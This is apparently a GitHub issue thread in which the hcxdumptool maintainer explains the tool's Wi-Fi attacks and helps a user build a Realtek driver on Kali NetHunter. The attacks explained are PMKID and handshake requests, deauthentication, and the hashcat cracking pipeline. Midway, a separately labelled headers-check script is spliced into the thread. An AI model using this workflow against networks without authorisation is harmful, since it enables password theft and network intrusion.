- Allow not connected CLIENTs to connect and request all EAPOL M2.
- REQUEST EAP-IDs.
- REQUEST PMKIDs.
on every WPA-PSK system (APs and CLIENTs) in range.
from hcxdumptool.
Does it deauthenticate clients from the AP to make them reconnect to get handshakes?
from hcxdumptool.
DEAUTHENTICATION and DISASSOCIATION attacks (old school) are implemented, too.
State of the art APs and CLIENTs are hardened against these ancient attacks.
Either they run Management Frame Protection (MFP) or they ignore DEAUTHENTICATION/DISASSOCIATION frames injected into data sequences.
from hcxdumptool.
Oh wow, so David Bombal's YouTube video could get you into a lot of trouble for denial of service, because he doesn't use a filter.
Does the rcascan just scan to gather information without any attacks?
from hcxdumptool.
rcascan provides 2 modes:
active scan
passive scan
Running active scan, it transmits PROBEREQUESTs and counts BEACONs and responses.
Running passive scan, it counts BEACONs.
All attacks are disabled running one of these modes.
Nearly every CLIENT is doing active scans to discover APs in range.
from hcxdumptool.
Ok, cool. My thinking is I want to start a business testing Wi-Fi passwords with real life tests. Do you have any advice?
from hcxdumptool.
hcxdumptool runs layer 2 attacks only.
It neither runs DoS attacks nor layer 1 attacks nor attacks > layer 2.
from hcxdumptool.
Real life attacks should include all layers (1 to 7) and you have to cover them all.
https://cdn.rohde-schwarz.com/pws/dl_downloads/dl_application/application_notes/1ma69/1MA69_2e.pdf
Therefore you have to learn the entire stuff (much more than I mentioned in README.md).
Regarding 802.11, a good starting point is:
802.11® Wireless Networks: The Definitive Guide
https://www.oreilly.com/library/view/80211-wireless-networks/0596100523/index.html
Regarding Linux, a good starting point is:
https://man7.org/tlpi/
Regarding coding, I suggest C and Assembler.
https://gcc.gnu.org/onlinedocs/gcc/
from hcxdumptool.
Yeah, that's a lot to learn. Oh yeah, I'm testing this on my home router, which I'm pretty sure is Wi-Fi 6, and it works, but it shouldn't work, should it?
from hcxdumptool.
hcxdumptool is state of the art and runs state of the art attacks against all WPA-PSK secured NETWORKs.
Even if the AP is hardened, most of the CLIENTs are weak (and hcxdumptool shows a successful attack with a "+" in the M2 column).
from hcxdumptool.
Do you mind if I put some of our conversation in a YouTube video? It is all interesting and I'm sure it will help others.
from hcxdumptool.
Maybe. But like Arch Linux, hcxdumptool and hcxtools are rolling release tools.
If I can do something better or faster, I'll change everything. In that case, a video will be outdated (like David's video).
That will cause new users to run into the same problems you did.
from hcxdumptool.
Yeah, I get what you're saying. So are you the actual creator of the hcx project? Is there anything you're working on at the moment, improvements or otherwise?
from hcxdumptool.
I'll say, watching a video or installing KALI by graphical installer is far, far away from handling hcxdumptool/hcxtools.
For beginners I recommend running aircrack-ng and learning 802.11 instead of doing
hcxdumptool -> hcxpcapngtool -> hashcat/JtR
Neither hcxdumptool, nor hcxtools, nor hashcat or JtR will satisfy a newbie.
https://hashcat.net/forum/thread-11669-post-59437.html#pid59437
from hcxdumptool.
We're working on:
hashcat/hashcat#3887
openwall/john#5365
and on WPA3.
from hcxdumptool.
Yeah, I'm defo a newbie. I typically don't use a Kali GUI, as I use a NetHunter phone and the GUI is crap. I use hashcat on Windows for the GPU speed and have used aircrack to attack, capture and crack hashes. Currently I'm trying to get an Alfa Wi-Fi adapter to work on NetHunter, as I've got it working on Kali Linux with drivers and headers, but am stuck.
from hcxdumptool.
My top ranking due to excellent driver support (if not connected to a USB3 port, due to USB3 problems) on the Linux stock kernel:
ALFA AWUS036ACHM and ALFA AWUS036ACM
from hcxdumptool.
The Kali docs for NetHunter say the RTL8812AU is supported in NetHunter, but it doesn't seem to work. I've reached out to David Bombal, as he has a working NetHunter phone and the Wi-Fi adapter I want to use, but not had a reply. Also reached out to someone on here, as it's his name that pops up in the error, but again not had a response. Not everyone is as nice as you at giving help.
from hcxdumptool.
RTL8812AU is not part of the Linux stock kernel.
I guess that KALI installs this driver by default:
https://github.com/aircrack-ng/rtl8812au
from hcxdumptool.
Yeah, when I go to make the aircrack driver, that's where the problems start. I guess it's something to do with the headers, but I can't find a NetHunter supported one; it's not on the Kali pool list.
from hcxdumptool.
Maybe it's a good idea to ask Christian (kimocoder).
from hcxdumptool.
In that picture I sent, cyberknight777's name pops up in the error, and I have messaged him but no reply. Who is Christian?
from hcxdumptool.
Maintainer of the aircrack-ng Realtek drivers and some other stuff:
https://github.com/kimocoder
from hcxdumptool.
Cool, thanks. No doubt I'll run into other problems lol.
from hcxdumptool.
Ok, I compiled the driver. Looking good, so far:
[25457.065189] usbcore: registered new interface driver rtl88XXau
[25465.063996] usb 1-9.3: new high-speed USB device number 9 using xhci_hcd
[25465.207410] usb 1-9.3: New USB device found, idVendor=7392, idProduct=a812, bcdDevice= 2.00
[25465.207414] usb 1-9.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[25465.207417] usb 1-9.3: Product: Edimax AC600 USB
[25465.207419] usb 1-9.3: Manufacturer: Realtek
[25465.207421] usb 1-9.3: SerialNumber: 00e04c000001
[25469.850382] usb 1-9.3: 88XXau 74:da:38:06:45:e7 hw_info[107]
[25469.904766] rtl88XXau 1-9.3:1.0 wlp22s0f0u9u3: renamed from wlan0
[25472.258862] mt7601u 5-2.4:1.0 wlp48s0f4u2u4: entered promiscuous mode
from hcxdumptool.
hcxdumptool is running fine, too:
$ sudo hcxdumptool -I wlp22s0f0u9u3
Requesting physical interface capabilities. This may take some time.
Please be patient...
interface information:
phy idx hw-mac virtual-mac m ifname driver (protocol)
---------------------------------------------------------------------------------------------
3 6 74da380645e7 74da380645e7 + wlp22s0f0u9u3 rtl88XXau (NETLINK)
available frequencies: frequency [channel] tx-power of Regulatory Domain: DE
2412 [ 1] 20.0 dBm 2417 [ 2] 20.0 dBm 2422 [ 3] 20.0 dBm 2427 [ 4] 20.0 dBm
2432 [ 5] 20.0 dBm 2437 [ 6] 20.0 dBm 2442 [ 7] 20.0 dBm 2447 [ 8] 20.0 dBm
2452 [ 9] 20.0 dBm 2457 [ 10] 20.0 dBm 2462 [ 11] 20.0 dBm 2467 [ 12] 20.0 dBm
2472 [ 13] 20.0 dBm 2484 [ 14] 20.0 dBm 5075 [ 15] 30.0 dBm 5080 [ 16] 30.0 dBm
5085 [ 17] 30.0 dBm 5090 [ 18] 30.0 dBm 5100 [ 20] 30.0 dBm 5120 [ 24] 30.0 dBm
5140 [ 28] 30.0 dBm 5160 [ 32] 23.0 dBm 5180 [ 36] 23.0 dBm 5200 [ 40] 23.0 dBm
5220 [ 44] 23.0 dBm 5240 [ 48] 23.0 dBm 5260 [ 52] 20.0 dBm 5280 [ 56] 20.0 dBm
5300 [ 60] 20.0 dBm 5320 [ 64] 20.0 dBm 5340 [ 68] 20.0 dBm 5360 [ 72] 30.0 dBm
5380 [ 76] 30.0 dBm 5400 [ 80] 30.0 dBm 5420 [ 84] 30.0 dBm 5440 [ 88] 30.0 dBm
5460 [ 92] 30.0 dBm 5480 [ 96] 26.0 dBm 5500 [100] 26.0 dBm 5520 [104] 26.0 dBm
5540 [108] 26.0 dBm 5560 [112] 26.0 dBm 5580 [116] 26.0 dBm 5600 [120] 26.0 dBm
5620 [124] 26.0 dBm 5640 [128] 26.0 dBm 5660 [132] 26.0 dBm 5680 [136] 26.0 dBm
5700 [140] 26.0 dBm 5720 [144] 13.0 dBm 5745 [149] 13.0 dBm 5765 [153] 13.0 dBm
5785 [157] 13.0 dBm 5805 [161] 13.0 dBm 5825 [165] 13.0 dBm 5845 [169] 13.0 dBm
5865 [173] 13.0 dBm 5885 [177] 30.0 dBm
bye-bye
from hcxdumptool.
And frame injection is working like a charm:
$ sudo hcxdumptool --rcascan=active
...
377 packet(s) captured
exit on sigterm
bye-bye
from hcxdumptool.
Yeah, shame it's not as easy for Kali NetHunter.
from hcxdumptool.
No, that is not fair to say.
KALI is an excellent distribution ... if you are an experienced Linux user (!!!) and an experienced penetration tester (!):
"As the distribution’s developers, you might expect us to recommend that everyone should be using Kali Linux. The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you’re unfamiliar with Linux or are looking for a general-purpose Linux desktop distribution for development, web design, gaming, etc."
https://www.kali.org/docs/introduction/should-i-use-kali-linux/#is-kali-linux-right-for-you
But shame on all tutorials and blogs that create the impression that it is good for a Linux beginner.
from hcxdumptool.
True.
from hcxdumptool.
I'm so confused, because on the Kali NetHunter docs page it says
from hcxdumptool.
Yet in this file it's nowhere to be found.
from hcxdumptool.
Different things:
These are the installed drivers (regarding Realtek, in your case mostly third party drivers and not stock Linux kernel drivers):
#355 (comment)
usually located here:
/usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/
This is the installed firmware:
#355 (comment)
usually located here:
/usr/lib/firmware/
from hcxdumptool.
Do you think I'm wasting my time trying to get the RTL8812AU driver working?
from hcxdumptool.
Once the dependencies are satisfied, this driver:
https://github.com/aircrack-ng/rtl8812au
should compile fine.
from hcxdumptool.
$ make
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/6.5.9-arch2-1/build M=/tmp/rtl8812au_aircrack-ng modules
make[1]: Entering directory '/usr/lib/modules/6.5.9-arch2-1/build'
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_cmd.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_security.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_debug.o
CC [M] /tmp/rtl8812au_aircrack-ng/core/rtw_io.o
...
...
...
MODPOST /tmp/rtl8812au_aircrack-ng/Module.symvers
CC [M] /tmp/rtl8812au_aircrack-ng/88XXau.mod.o
LD [M] /tmp/rtl8812au_aircrack-ng/88XXau.ko
BTF [M] /tmp/rtl8812au_aircrack-ng/88XXau.ko
make[1]: Leaving directory '/usr/lib/modules/6.5.9-arch2-1/build'
---------------------------------------------------------------------------
Visit https://github.com/aircrack-ng/rtl8812au for support/reporting issues
or check for newer versions (branches) of these drivers.
---------------------------------------------------------------------------
$ zstd 88XXau.ko
88XXau.ko : 22.03% ( 4.40 MiB => 993 KiB, 88XXau.ko.zst)
$ ls *.zst
88XXau.ko.zst
A few warnings appeared during compile time, but this shouldn't be a show stopper.
Finally I got a working module: 88XXau.ko.zst
from hcxdumptool.
from hcxdumptool.
Missing dependencies:
Linux headers (matching with your kernel) are not installed.
from hcxdumptool.
Cannot find them on the Web anywhere.
from hcxdumptool.
https://forums.kali.org/showthread.php?71975-Hey!-How-to-install-linux-headers-for-nethunter
from hcxdumptool.
from hcxdumptool.
typo:
wrong: uname-r
correct: uname -r
from hcxdumptool.
from hcxdumptool.
Old driver that depends on the old kernel 4.14.
from hcxdumptool.
I've asked cyberknight777, kimcoder, aircrack-ng, yesimxev and droidkali. Don't know what to do now except give up and find a different adaptor.
from hcxdumptool.
There is no rtl8812au driver on git "cyberknight777"
https://github.com/search?q=cyberknight777+rtl8812au&type=repositories
from hcxdumptool.
Yeah, it doesn't exist. I've spent hours looking for it.
from hcxdumptool.
You will not be able to compile this outdated driver.
from hcxdumptool.
Best give up then I guess. Is it safe to assume that the ES File Explorer pic I sent shows compatible drivers, as my tilink driver is there and that worked out of the box with no problems?
from hcxdumptool.
Tplink*
from hcxdumptool.
Installing an out-of-tree driver isn't easy.
Better to use a device running a stock Linux kernel driver.
I have good reasons to mention that in README.md:
No support for a third party driver which is not part of the official Linux kernel (https://www.kernel.org/)
Report related issues to the site from which you downloaded the driver
Running third party drivers means that you will run into problems.
from hcxdumptool.
Is there a file with the stock kernel drivers in nethunter?
from hcxdumptool.
Stock drivers means that the driver comes with the Linux kernel:
That is not the case on rtl8812au.
You have to go for a third party driver, e.g.:
$ git clone https://github.com/aircrack-ng/rtl8812au
from hcxdumptool.
That's the same one I've been trying to install.
from hcxdumptool.
First of all you have to fix your configuration problems:
Looks like the kernel header API doesn't match your kernel headers: 4.14 vs 6.5
An example:
I'm on
$ uname -r
6.5.9-arch2-1
So my api headers should be on 6.x:
linux-api-headers 6.4-1
linux-headers 6.5.9.arch2-1
from hcxdumptool.
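The comment above boils down to one preflight check before running `make` in the driver directory: the build tree the module is compiled against must belong to the same major.minor kernel as the one that is running, and must exist at all. The following is an added example, not code from the thread or from the hcxdumptool or rtl8812au projects; it assumes the usual `/lib/modules/<release>/build` layout (the `/usr/lib/modules` path in the thread is the same tree via the `/lib` symlink on Arch), and the kernel version strings used in the comments are taken from the thread or constructed for illustration.

```shell
# Added example (not from the thread): verify that installed kernel headers
# match the running kernel before building an out-of-tree module such as 88XXau.
# A mismatch like the 4.14 headers vs 6.5 kernel seen in this thread either
# fails to compile or produces a module the running kernel refuses to load.

# Reduce a kernel release string to its major.minor part.
# "6.5.9-arch2-1" -> "6.5", "6.5.9.arch2-1" -> "6.5", "4.14.180-perf" -> "4.14"
kver_major_minor() {
    printf '%s\n' "$1" | sed -E 's/^([0-9]+\.[0-9]+).*/\1/'
}

# Return 0 when the headers version and the kernel release share major.minor.
# Package versions may separate fields with "." or "-" (6.5.9.arch2-1 vs
# 6.5.9-arch2-1); only the leading digits are compared, so both forms work.
headers_match_kernel() {
    [ "$(kver_major_minor "$1")" = "$(kver_major_minor "$2")" ]
}

# Assumed layout: the build tree for a kernel release lives at
# /lib/modules/<release>/build and carries the kernel Makefile.
# Return 0 if a usable tree for the given release is present.
build_tree_present() {
    [ -f "/lib/modules/$1/build/Makefile" ]
}

# Preflight for "make" in the driver directory. Takes the installed headers
# version (e.g. the second field of "pacman -Q linux-headers") as $1,
# prints a verdict and returns non-zero on any problem so it can gate a build.
preflight_module_build() {
    _running="$(uname -r)"
    _headers="$1"
    _rc=0
    if ! build_tree_present "$_running"; then
        echo "no build tree at /lib/modules/$_running/build: install the headers package for this exact kernel"
        _rc=1
    fi
    if ! headers_match_kernel "$_headers" "$_running"; then
        echo "headers $_headers do not match running kernel $_running"
        _rc=1
    fi
    [ "$_rc" -eq 0 ] && echo "ok: headers $_headers match kernel $_running"
    return "$_rc"
}

# Usage: preflight_module_build "$(pacman -Q linux-headers | awk '{print $2}')" && make
```

The version comparison deliberately stops at major.minor: patch releases within the same series still build against each other's headers in practice, while the thread's 4.14 vs 6.5 gap is exactly the case the check is meant to catch. The build-tree test catches the other common failure, headers for a different release installed alongside the running kernel.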
Is there a way to find what drivers came preinstalled with my nethunter kernel
from hcxdumptool.
$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/
Should give a list like this:
admtek broadcom intersil mediatek quantenna rsi ti
ath cisco legacy microchip ralink silabs virtual
atmel intel marvell purelifi realtek st zydas
and
$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/mediatek
Should show you the MediaTek drivers:
mt76 mt7601u
from hcxdumptool.
Can't work, because it is a Linux (only) example.
You have to search for the modules directory of your distribution.
BTW:
It looks like it is not an official KALI nethunter distribution.
from hcxdumptool.
I used the nethunter installer for my phone make and model, so it should be the official one.
from hcxdumptool.
What is the output of uname -r?
from hcxdumptool.